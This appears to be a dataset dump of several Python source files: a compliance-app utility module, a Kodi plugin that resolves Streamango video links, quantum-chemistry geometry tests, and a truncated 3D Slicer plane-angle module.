text
stringlengths 681
1.05M
| score
float64 0
0.27
|
---|---|
# Copyright (C) 2016 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
import datetime
import json
import re
import sqlalchemy
import sys
from flask import request
from ggrc.settings import CUSTOM_URL_ROOT
from ggrc.utils import benchmarks
class GrcEncoder(json.JSONEncoder):
"""Custom JSON Encoder to handle datetime objects and sets
from:
`http://stackoverflow.com/questions/12122007/python-json-encoder-to-support-datetime`_
also consider:
`http://hg.tryton.org/2.4/trytond/file/ade5432ac476/trytond/protocols/jsonrpc.py#l53`_
"""
def default(self, obj):
if isinstance(obj, datetime.datetime):
return obj.isoformat()
elif isinstance(obj, datetime.date):
return obj.isoformat()
elif isinstance(obj, datetime.timedelta):
return (datetime.datetime.min + obj).time().isoformat()
elif isinstance(obj, set):
return list(obj)
else:
return super(GrcEncoder, self).default(obj)
def as_json(obj, **kwargs):
return json.dumps(obj, cls=GrcEncoder, **kwargs)
def service_for(obj):
module = sys.modules['ggrc.services']
if type(obj) is str or type(obj) is unicode: # noqa
model_type = obj
else:
model_type = obj.__class__.__name__
return getattr(module, model_type, None)
def url_for(obj, id=None):
service = service_for(obj)
if service is None:
return None
if not hasattr(service, 'url_for'):
return None
if id is not None:
return service.url_for(id=id)
return service.url_for(obj)
def view_service_for(obj):
module = sys.modules['ggrc.views']
if type(obj) is str or type(obj) is unicode: # noqa
model_type = obj
else:
model_type = obj.__class__.__name__
return getattr(module, model_type, None)
def view_url_for(obj, id=None):
service = view_service_for(obj)
if service is None:
return None
if not hasattr(service, 'url_for'):
return None
if id is not None:
return service.url_for(id=id)
return service.url_for(obj)
def encoded_dict(in_dict):
# http://stackoverflow.com/questions/6480723/urllib-urlencode-doesn't-like-unicode-values-how-about-this-workaround
out_dict = {}
for k, v in in_dict.iteritems():
if isinstance(v, unicode): # noqa
v = v.encode('utf8')
elif isinstance(v, str):
# Must be encoded in UTF-8
v.decode('utf8')
out_dict[k] = v
return out_dict
def merge_dict(destination, source, path=None):
"""merges source into destination"""
if path is None:
path = []
for key in source:
if key in destination:
if isinstance(destination[key], dict) and isinstance(source[key], dict):
merge_dict(destination[key], source[key], path + [str(key)])
elif destination[key] == source[key]:
pass # same leaf value
else:
raise Exception('Conflict at %s' % '.'.join(path + [str(key)]))
else:
destination[key] = source[key]
return destination
def merge_dicts(*args):
result = {}
for arg in args:
result = merge_dict(result, arg)
return result
def get_url_root():
if CUSTOM_URL_ROOT is not None:
return CUSTOM_URL_ROOT
return request.url_root
def get_mapping_rules():
""" Get mappings rules as defined in business_object.js
Special cases:
Aduit has direct mapping to Program with program_id
Request has a direct mapping to Audit with audit_id
Section has a direct mapping to Standard/Regulation/Poicy with directive_id
Anything can be mapped to a request, frotent show audit insted
"""
def filter(object_list):
""" remove all lower case items since real object are CamelCase """
return set([item for item in object_list if item != item.lower()])
# these rules are copy pasted from
# src/ggrc/assets/javascripts/apps/base_widgets.js line: 9
# WARNING ########################################################
# Manually added Risks and threats to the list from base_widgets #
##################################################################
# TODO: Read these rules from different modules and combine them here.
business_object_rules = {
"AccessGroup": "Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Audit": "AccessGroup Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor", # noqa
# "AssessmentTemplate": "Audit", # Uncomment this line when we add support for assessment templates in exports # noqa
"Clause": "AccessGroup Audit Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Contract": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Control": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Assessment": "AccessGroup Audit Clause Contract Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"DataAsset": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Facility": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Issue": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Market": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Objective": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"OrgGroup": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Person": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Policy Process Product Program Project Regulation Request Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Policy": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Process": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Product": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Program": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Project": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Regulation": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Request": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Section": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Standard": "AccessGroup Audit Clause Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Process Product Program Project Request Section System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"System": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Vendor": "AccessGroup Audit Clause Contract Control Assessment DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat CycleTaskGroupObjectTask", # noqa
"Risk": "AccessGroup Clause Contract Assessment Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Threat CycleTaskGroupObjectTask", # noqa
"Threat": "AccessGroup Clause Contract Assessment Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk CycleTaskGroupObjectTask", # noqa
"CycleTaskGroupObjectTask": "AccessGroup Clause Contract Assessment Control DataAsset Facility Issue Market Objective OrgGroup Person Policy Process Product Program Project Regulation Request Section Standard System Vendor Risk Threat", # noqa
}
split_rules = {k: v.split() for k, v in business_object_rules.items()}
filtered_rules = {k: filter(v) for k, v in split_rules.items()}
return filtered_rules
def _prefix_camelcase(name, prefix):
name = name[:1].lower() + name[1:]
return re.sub(r'[A-Z]', lambda pat: prefix + pat.group(0).lower(), name)
def underscore_from_camelcase(name):
return _prefix_camelcase(name, "_")
def title_from_camelcase(name):
return _prefix_camelcase(name, " ")
def get_fuzzy_date(delta_date):
"""Get a human readable date string.
This function returns a human friendly time delta compared to today.
Args:
delta_date (date): Date that we want to show to the user.
Returns:
string: A human readable representation date delta.
Examples:
>>> get_fuzzy_date(datetime.date.today() + datetime.timedelta(2))
'in 2 days'
>>> get_fuzzy_date(datetime.date.today())
'today'
>>> get_fuzzy_date(datetime.date.today() + datetime.timedelta(-1))
'1 day ago'
"""
if not delta_date:
return ""
if isinstance(delta_date, datetime.datetime):
delta_date = delta_date.date()
delta = delta_date - datetime.date.today()
if delta.days < 0:
days = abs(delta.days)
return "{} day{} ago".format(days, "s" if days > 1 else "")
if delta.days == 0:
return "today"
# TODO: use format_timedelta from babel package.
return "in {} day{}".format(delta.days, "s" if delta.days > 1 else "")
# pylint: disable=too-few-public-methods
# because this is a small context manager
class QueryCounter(object):
"""Context manager for counting sqlalchemy database queries.
Usage:
with QueryCounter() as counter:
query_count = counter.get
"""
def __init__(self):
self.queries = []
def after_cursor_execute(*args):
self.queries.append(args[2])
self.listener = after_cursor_execute
def __enter__(self):
sqlalchemy.event.listen(sqlalchemy.engine.Engine,
"after_cursor_execute",
self.listener)
return self
def __exit__(self, *_):
sqlalchemy.event.remove(sqlalchemy.engine.Engine,
"after_cursor_execute",
self.listener)
@property
def get(self):
return len(self.queries)
benchmark = benchmarks.get_benchmark()
with_nop = benchmarks.WithNop
| 0.005699 |
"""
urlresolver Kodi Addon
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import re
from lib import helpers
from urlresolver import common
from urlresolver.resolver import UrlResolver, ResolverError
class StreamangoResolver(UrlResolver):
name = "streamango"
domains = ['streamango.com', "streamcherry.com"]
pattern = '(?://|\.)(stream(?:ango|cherry)\.com)/(?:v/d|f|embed)/([0-9a-zA-Z]+)'
def __init__(self):
self.net = common.Net()
def get_media_url(self, host, media_id):
web_url = self.get_url(host, media_id)
headers = {'User-Agent': common.RAND_UA}
html = self.net.http_GET(web_url, headers=headers).content
if html:
encoded = re.search('''srces\.push\({type:"video/mp4",src:\w+\('([^']+)',(\d+)''', html)
if encoded:
source = self.decode(encoded.group(1), int(encoded.group(2)))
if source:
source = "http:%s" % source if source.startswith("//") else source
source = source.split("/")
if not source[-1].isdigit():
source[-1] = re.sub('[^\d]', '', source[-1])
source = "/".join(source)
headers.update({'Referer': web_url})
return source + helpers.append_headers(headers)
raise ResolverError("Unable to locate video")
def decode(self, encoded, code):
_0x59b81a = ""
k = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='
k = k[::-1]
count = 0
for index in range(0, len(encoded) - 1):
while count <= len(encoded) - 1:
_0x4a2f3a = k.index(encoded[count])
count += 1
_0x29d5bf = k.index(encoded[count])
count += 1
_0x3b6833 = k.index(encoded[count])
count += 1
_0x426d70 = k.index(encoded[count])
count += 1
_0x2e4782 = ((_0x4a2f3a << 2) | (_0x29d5bf >> 4))
_0x2c0540 = (((_0x29d5bf & 15) << 4) | (_0x3b6833 >> 2))
_0x5a46ef = ((_0x3b6833 & 3) << 6) | _0x426d70
_0x2e4782 = _0x2e4782 ^ code
_0x59b81a = str(_0x59b81a) + chr(_0x2e4782)
if _0x3b6833 != 64:
_0x59b81a = str(_0x59b81a) + chr(_0x2c0540)
if _0x3b6833 != 64:
_0x59b81a = str(_0x59b81a) + chr(_0x5a46ef)
return _0x59b81a
def get_url(self, host, media_id):
return self._default_get_url(host, media_id, 'http://{host}/embed/{media_id}')
| 0.005773 |
import sys
import pytest
from utils import *
from addons import *
subject1 = """
3 au
Co 0 0 0
H 2 0 0
h_OTher -2 0 0
"""
ans1_au = """3 au
CoH2
Co 0.000000000000 0.000000000000 0.000000000000
H 2.000000000000 0.000000000000 0.000000000000
H -2.000000000000 -0.000000000000 0.000000000000
"""
ans1_ang = """3
CoH2
Co 0.000000000000 0.000000000000 0.000000000000
H 1.058354421340 0.000000000000 0.000000000000
H -1.058354421340 -0.000000000000 0.000000000000
"""
ans1c_ang = """3
CoH2
59Co 0.00000000 0.00000000 0.00000000
1H 1.05835442 0.00000000 0.00000000
1H_other -1.05835442 -0.00000000 0.00000000
"""
#subject2 = """
#Co 0 0 0
#units au
#no_reorient
#--
#@H 2 0 0
#h_OTher -2 0 0
#"""
#
#ans2_au = """3 au
#
#Co 0.000000000000 0.000000000000 0.000000000000
#@H 2.000000000000 0.000000000000 0.000000000000
#H -2.000000000000 0.000000000000 0.000000000000"""
#
#ans2_ang = """3
#
#Co 0.000000000000 0.000000000000 0.000000000000
#Gh(1) 1.058354417180 0.000000000000 0.000000000000
#H -1.058354417180 0.000000000000 0.000000000000"""
#
#ans2c_ang = """2
#
#Co 0.000000000000 0.000000000000 0.000000000000
#H -1.058354417180 0.000000000000 0.000000000000"""
subject2 = """
Co 0 0 0
no_reorient
--
@H 1.05835442134 0 0
h_OTher -1.05835442134 0 0
"""
ans2_au = """3 au
CoH2
Co 0.000000000000 0.000000000000 0.000000000000
@H 2.000000000000 0.000000000000 0.000000000000
H -2.000000000000 0.000000000000 0.000000000000
"""
ans2_ang = """3
CoH2
Co 0.000000000000 0.000000000000 0.000000000000
Gh(1) 1.058354421340 0.000000000000 0.000000000000
H -1.058354421340 0.000000000000 0.000000000000
"""
ans2c_ang = """2
CoH2
Co 0.000000000000 0.000000000000 0.000000000000
H -1.058354421340 0.000000000000 0.000000000000
"""
def test_toxyz_1a():
subject = subject1
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', units='Bohr')
assert compare_strings(ans1_au, xyz, sys._getframe().f_code.co_name)
def test_toxyz_1b():
subject = subject1
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', units='Angstrom')
assert compare_strings(ans1_ang, xyz, sys._getframe().f_code.co_name)
def test_toxyz_1c():
subject = subject1
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', prec=8, atom_format='{elea}{elem}{elbl}')
print(xyz)
assert compare_strings(ans1c_ang, xyz, sys._getframe().f_code.co_name)
#def test_toxyz_2a():
# subject = subject2
# mol = qcdb.Molecule(subject)
#
# xyz = mol.to_string(dtype='xyz', units='Bohr')
#
# assert compare_strings(ans2_au, xyz, sys._getframe().f_code.co_name)
#
#def test_toxyz_2b():
# subject = subject2
# mol = qcdb.Molecule(subject)
#
# xyz = mol.to_string(dtype='xyz', units='Angstrom', ghost_format='Gh({elez})')
#
# assert compare_strings(ans2_ang, xyz, sys._getframe().f_code.co_name)
#
#def test_toxyz_2c():
# subject = subject2
# mol = qcdb.Molecule(subject)
#
# xyz = mol.to_string(dtype='xyz', units='Angstrom', ghost_format='')
#
# assert compare_strings(ans2c_ang, xyz, sys._getframe().f_code.co_name)
def test_toxyz_2a():
subject = subject2
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', units='Bohr')
assert compare_strings(ans2_au, xyz, sys._getframe().f_code.co_name)
def test_toxyz_2b():
subject = subject2
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', units='Angstrom', ghost_format='Gh({elez})')
assert compare_strings(ans2_ang, xyz, sys._getframe().f_code.co_name)
def test_toxyz_2c():
subject = subject2
mol = qcdb.Molecule(subject)
xyz = mol.to_string(dtype='xyz', units='Angstrom', ghost_format='')
assert compare_strings(ans2c_ang, xyz, sys._getframe().f_code.co_name)
@using_psi4_molrec
def test_toxyz_3a():
import psi4
subject = subject2
mol = psi4.core.Molecule.from_string(subject)
xyz = mol.to_string(dtype='xyz', units='Bohr')
assert compare_strings(ans2_au, xyz, sys._getframe().f_code.co_name)
| 0.00659 |
from __main__ import vtk, qt, ctk, slicer
import numpy
from math import *
from slicer.ScriptedLoadableModule import *
import os
import pickle
import time
from sys import maxint
MAXINT = maxint
from slicer.util import VTKObservationMixin
class ModelAddedClass(VTKObservationMixin):
def __init__(self, anglePlanes):
VTKObservationMixin.__init__(self)
self.addObserver(slicer.mrmlScene, slicer.vtkMRMLScene.NodeAddedEvent, self.nodeAddedCallback)
self.addObserver(slicer.mrmlScene, slicer.vtkMRMLScene.NodeRemovedEvent, self.nodeRemovedCallback)
self.anglePlanes = anglePlanes
@vtk.calldata_type(vtk.VTK_OBJECT)
def nodeAddedCallback(self, caller, eventId, callData):
if isinstance(callData, slicer.vtkMRMLModelNode):
self.addObserver(callData, callData.PolyDataModifiedEvent, self.onModelNodePolyDataModified)
@vtk.calldata_type(vtk.VTK_OBJECT)
def nodeRemovedCallback(self, caller, eventId, callData):
if isinstance(callData, slicer.vtkMRMLModelNode):
self.removeObserver(callData, callData.PolyDataModifiedEvent, self.onModelNodePolyDataModified)
self.anglePlanes.removeModelPointLocator(callData.GetName())
def onModelNodePolyDataModified(self, caller, eventId):
self.anglePlanes.addModelPointLocator(caller.GetName(), caller.GetPolyData())
class AnglePlanes(ScriptedLoadableModule):
def __init__(self, parent):
ScriptedLoadableModule.__init__(self, parent)
parent.title = "Angle Planes"
parent.categories = ["Shape Analysis"]
parent.dependencies = []
parent.contributors = ["Julia Lopinto", "Juan Carlos Prieto"]
parent.helpText = """
This Module is used to calculate the angle between two planes by using the normals.
The user gets the choice to use two planes which are already implemented on Slicer
or they can define a plane by using landmarks (at least 3 landmarks).
Plane can also be saved to be reused for other models.
This is an alpha version of the module.
It can't be used for the moment.
"""
parent.acknowledgementText = """
This work was supported by the National
Institutes of Dental and Craniofacial Research
and Biomedical Imaging and Bioengineering of
the National Institutes of Health under Award
Number R01DE024450.
"""
self.parent = parent
class AnglePlanesWidget(ScriptedLoadableModuleWidget):
def setup(self):
ScriptedLoadableModuleWidget.setup(self)
self.moduleName = "AnglePlanes"
self.i = 0
self.logic = AnglePlanesLogic()
self.planeControlsId = 0
self.planeControlsDictionary = {}
self.midPointFiducialDictionaryID = {}
# self.logic.initializePlane()
self.n_vector = numpy.matrix([[0], [0], [1], [1]])
self.interactionNode = slicer.mrmlScene.GetNodeByID("vtkMRMLInteractionNodeSingleton")
#Definition of the 2 planes
# Collapsible button -- Scene Description
self.loadCollapsibleButton = ctk.ctkCollapsibleButton()
self.loadCollapsibleButton.text = "Scene"
self.layout.addWidget(self.loadCollapsibleButton)
# Layout within the laplace collapsible button
self.loadFormLayout = qt.QFormLayout(self.loadCollapsibleButton)
#--------------------------- List of Models --------------------------#
treeView = slicer.qMRMLTreeView()
treeView.setMRMLScene(slicer.app.mrmlScene())
treeView.setSceneModelType('Displayable')
treeView.sceneModel().setHorizontalHeaderLabels(["Models"])
treeView.sortFilterProxyModel().nodeTypes = ['vtkMRMLModelNode']
header = treeView.header()
header.setResizeMode(0, qt.QHeaderView.Stretch)
header.setVisible(True)
self.loadFormLayout.addWidget(treeView)
# numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode")
# for i in range (3,numNodes):
# self.elements = slicer.mrmlScene.GetNthNodeByClass(i,"vtkMRMLModelNode" )
# print self.elements.GetName()
# Add vertical spacer
self.layout.addStretch(1)
#------------------------ Compute Bounding Box ----------------------#
buttonFrameBox = qt.QFrame(self.parent)
buttonFrameBox.setLayout(qt.QHBoxLayout())
self.loadFormLayout.addWidget(buttonFrameBox)
self.computeBox = qt.QPushButton("Compute Bounding Box around all models")
buttonFrameBox.layout().addWidget(self.computeBox)
self.computeBox.connect('clicked()', self.onComputeBox)
self.CollapsibleButton = ctk.ctkCollapsibleButton()
self.CollapsibleButton.text = "Manage planes"
self.layout.addWidget(self.CollapsibleButton)
self.managePlanesFormLayout = qt.QFormLayout(self.CollapsibleButton)
self.CollapsibleButton.checked = True
# Add planes and manage landmark addition to each plane
addNewPlaneLayout = qt.QHBoxLayout()
addPlaneLabel = qt.QLabel('Add new plane')
addPlaneButton = qt.QPushButton(qt.QIcon(":/Icons/MarkupsAddFiducial.png"), " ")
addPlaneButton.setFixedSize(50,25)
addPlaneButton.connect('clicked()', self.addNewPlane)
addPlaneButton.setEnabled(True)
addNewPlaneLayout.addWidget(addPlaneLabel)
addNewPlaneLayout.addWidget(addPlaneButton)
self.managePlanesFormLayout.addRow(addNewPlaneLayout)
# ----------------- Compute Mid Point -------------
self.midPointGroupBox = ctk.ctkCollapsibleButton()
self.midPointGroupBox.setText('Define middle point between two landmarks')
self.midPointGroupBox.collapsed = True
self.parent.layout().addWidget(self.midPointGroupBox)
self.landmarkComboBox1MidPoint = qt.QComboBox()
self.landmarkComboBox2MidPoint = qt.QComboBox()
landmark1Layout = qt.QFormLayout()
landmark1Layout.addRow('Landmark A: ', self.landmarkComboBox1MidPoint)
landmark1Layout.addRow('Landmark B: ', self.landmarkComboBox2MidPoint)
self.defineMiddlePointButton = qt.QPushButton(' Add middle point ')
# self.midPointOnSurfaceCheckBox = qt.QCheckBox('On Surface')
# self.midPointOnSurfaceCheckBox.setChecked(False)
exportLayout_1 = qt.QFormLayout()
# exportLayout_1.addRow(self.midPointOnSurfaceCheckBox, self.defineMiddlePointButton)
exportLayout_1.addRow(self.defineMiddlePointButton)
self.midPointLayout = qt.QVBoxLayout()
self.midPointLayout.addLayout(landmark1Layout)
self.midPointLayout.addLayout(exportLayout_1)
self.midPointGroupBox.setLayout(self.midPointLayout)
self.defineMiddlePointButton.connect('clicked()', self.onAddMidPoint)
# self.landmarkComboBox1MidPoint.connect('currentIndexChanged(int)', self.onUpdateMidPoint)
# self.landmarkComboBox2MidPoint.connect('currentIndexChanged(int)', self.onUpdateMidPoint)
# -------- Calculate angles between planes ------------
self.CollapsibleButtonPlane = ctk.ctkCollapsibleButton()
self.CollapsibleButtonPlane.text = "Choose planes"
self.layout.addWidget(self.CollapsibleButtonPlane)
sampleFormLayoutPlane = qt.QFormLayout(self.CollapsibleButtonPlane)
self.planeComboBox1 = qt.QComboBox()
self.planeComboBox1.addItem("red")
self.planeComboBox1.addItem("yellow")
self.planeComboBox1.addItem("green")
sampleFormLayoutPlane.addRow("Select plane 1: ", self.planeComboBox1)
self.planeComboBox2 = qt.QComboBox()
self.planeComboBox2.addItem("red")
self.planeComboBox2.addItem("yellow")
self.planeComboBox2.addItem("green")
sampleFormLayoutPlane.addRow("Select plane 2: ", self.planeComboBox2)
self.CollapsibleButton2 = ctk.ctkCollapsibleButton()
self.CollapsibleButton2.text = "Results"
self.layout.addWidget(self.CollapsibleButton2)
sampleFormLayout2 = qt.QFormLayout(self.CollapsibleButton2)
self.results = qt.QPushButton("Results")
self.results.connect('clicked()', self.angleValue)
sampleFormLayout2.addWidget(self.results)
label_RL = qt.QLabel("R-L View")
self.getAngle_RL = qt.QLabel("0")
label_SI = qt.QLabel("S-I View")
self.getAngle_SI = qt.QLabel("0")
label_AP = qt.QLabel("A-P View")
self.getAngle_AP = qt.QLabel("0")
self.getAngle_RL_comp = qt.QLabel("0")
self.getAngle_SI_comp = qt.QLabel("0")
self.getAngle_AP_comp = qt.QLabel("0")
tableResult = qt.QTableWidget(3, 3)
tableResult.setColumnCount(3)
tableResult.setHorizontalHeaderLabels([' View ', 'Angle', 'Complementary angle'])
tableResult.setColumnWidth(0, 80)
tableResult.setColumnWidth(1, 80)
tableResult.setColumnWidth(2, 180)
tableResult.setRowCount(1)
tableResult.setCellWidget(0, 0, label_RL)
tableResult.setCellWidget(0, 1, self.getAngle_RL)
tableResult.setCellWidget(0, 2, self.getAngle_RL_comp)
tableResult.setRowCount(2)
tableResult.setCellWidget(1, 0, label_SI)
tableResult.setCellWidget(1, 1, self.getAngle_SI)
tableResult.setCellWidget(1, 2, self.getAngle_SI_comp)
tableResult.setRowCount(3)
tableResult.setCellWidget(2, 0, label_AP)
tableResult.setCellWidget(2, 1, self.getAngle_AP)
tableResult.setCellWidget(2, 2, self.getAngle_AP_comp)
# Add vertical spacer
self.layout.addStretch(1)
sampleFormLayout2.addWidget(tableResult)
self.CollapsibleButton3 = ctk.ctkCollapsibleButton()
self.CollapsibleButton3.text = "Save"
self.layout.addWidget(self.CollapsibleButton3)
sampleFormLayout3 = qt.QFormLayout(self.CollapsibleButton3)
self.CollapsibleButton3.checked = False
buttonFrame = qt.QFrame(self.parent)
buttonFrame.setLayout(qt.QVBoxLayout())
sampleFormLayout3.addWidget(buttonFrame)
#-------------------------------- PLANES --------------------------------#
save_plane = qt.QLabel("Save the planes you create as a txt file.")
buttonFrame.layout().addWidget(save_plane)
save = qt.QPushButton("Save plane")
buttonFrame.layout().addWidget(save)
# load_plane = qt.QLabel("Load the file with the plane you saved.")
# buttonFrame.layout().addWidget(load_plane)
read = qt.QPushButton("Load plane")
buttonFrame.layout().addWidget(read)
#-------------------------------- CONNECTIONS --------------------------------#
self.planeComboBox1.connect('currentIndexChanged(QString)', self.valueComboBox)
self.planeComboBox2.connect('currentIndexChanged(QString)', self.valueComboBox)
save.connect('clicked(bool)', self.onSavePlanes)
read.connect('clicked(bool)', self.onReadPlanes)
slicer.mrmlScene.AddObserver(slicer.mrmlScene.EndCloseEvent, self.onCloseScene)
self.pointLocatorDictionary = {}
numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode")
for i in range (3, numNodes):
modelnode = slicer.mrmlScene.GetNthNodeByClass(i,"vtkMRMLModelNode" )
self.addModelPointLocator(modelnode.GetName(), modelnode.GetPolyData())
ModelAddedClass(self)
def removeModelPointLocator(self, name):
if name in self.pointLocatorDictionary:
print("Removing point locator {0}".format(name))
del self.pointLocatorDictionary[name]
def addModelPointLocator(self, name, polydata):
if not name in self.pointLocatorDictionary:
print "Adding point locator: {0}".format(name)
pointLocator = vtk.vtkPointLocator()
pointLocator.SetDataSet(polydata)
pointLocator.AutomaticOn()
pointLocator.BuildLocator()
self.pointLocatorDictionary[name] = pointLocator
def addNewPlane(self, keyLoad = -1):
if keyLoad != -1:
self.planeControlsId = keyLoad
else:
self.planeControlsId += 1
planeControls = AnglePlanesWidgetPlaneControl(self, self.planeControlsId, self.pointLocatorDictionary)
self.managePlanesFormLayout.addRow(planeControls)
key = "Plane " + str(self.planeControlsId)
self.planeControlsDictionary[key] = planeControls
self.planeComboBox1.addItem(key)
self.planeComboBox2.addItem(key)
def onComputeBox(self):
numNodes = slicer.mrmlScene.GetNumberOfNodesByClass("vtkMRMLModelNode")
bound = [MAXINT, -MAXINT, MAXINT, -MAXINT, MAXINT, -MAXINT]
for i in range (3,numNodes):
self.elements = slicer.mrmlScene.GetNthNodeByClass(i,"vtkMRMLModelNode" )
node = slicer.util.getNode(self.elements.GetName())
polydata = node.GetPolyData()
tempbound = polydata.GetBounds()
bound[0] = min(bound[0], tempbound[0])
bound[2] = min(bound[2], tempbound[2])
bound[4] = min(bound[4], tempbound[4])
bound[1] = max(bound[1], tempbound[1])
bound[3] = max(bound[3], tempbound[3])
bound[5] = max(bound[5], tempbound[5])
#--------------------------- Box around the model --------------------------#
# print "bound", bound
dimX = bound[1]-bound[0]
dimY = bound[3]-bound[2]
dimZ = bound[5]-bound[4]
# print "dimension X :", dimX
# print "dimension Y :", dimY
# print "dimension Z :", dimZ
dimX = dimX + 10
dimY = dimY + 10
dimZ = dimZ + 10
sampleVolumeNode = slicer.vtkMRMLScalarVolumeNode()
sampleVolumeNode = slicer.mrmlScene.AddNode(sampleVolumeNode)
imageData = vtk.vtkImageData()
# Do NOT set the spacing and the origin of imageData (vtkImageData)
# The spacing and the origin should only be set in the vtkMRMLScalarVolumeNode!!!!!!
imageData.SetDimensions(int(dimX), int(dimY), int(dimZ))
imageData.AllocateScalars(vtk.VTK_UNSIGNED_CHAR, 1)
extent = imageData.GetExtent()
for x in xrange(extent[0], extent[1]+1):
for y in xrange(extent[2], extent[3]+1):
for z in xrange(extent[4], extent[5]+1):
imageData.SetScalarComponentFromDouble(x,y,z,0,0)
sampleVolumeNode.SetSpacing(1, 1, 1)
sampleVolumeNode.SetOrigin(bound[0], bound[2], bound[4])
sampleVolumeNode.SetName("Empty_volume")
sampleVolumeNode.SetAndObserveImageData(imageData)
sampleVolumeNode.SetLabelMap(1)
labelmapVolumeDisplayNode = slicer.vtkMRMLLabelMapVolumeDisplayNode()
slicer.mrmlScene.AddNode(labelmapVolumeDisplayNode)
colorNode = slicer.util.getNode('GenericAnatomyColors')
labelmapVolumeDisplayNode.SetAndObserveColorNodeID(colorNode.GetID())
labelmapVolumeDisplayNode.VisibilityOn()
sampleVolumeNode.SetAndObserveDisplayNodeID(labelmapVolumeDisplayNode.GetID())
count = slicer.mrmlScene.GetNumberOfNodesByClass('vtkMRMLSliceCompositeNode')
for n in xrange(count):
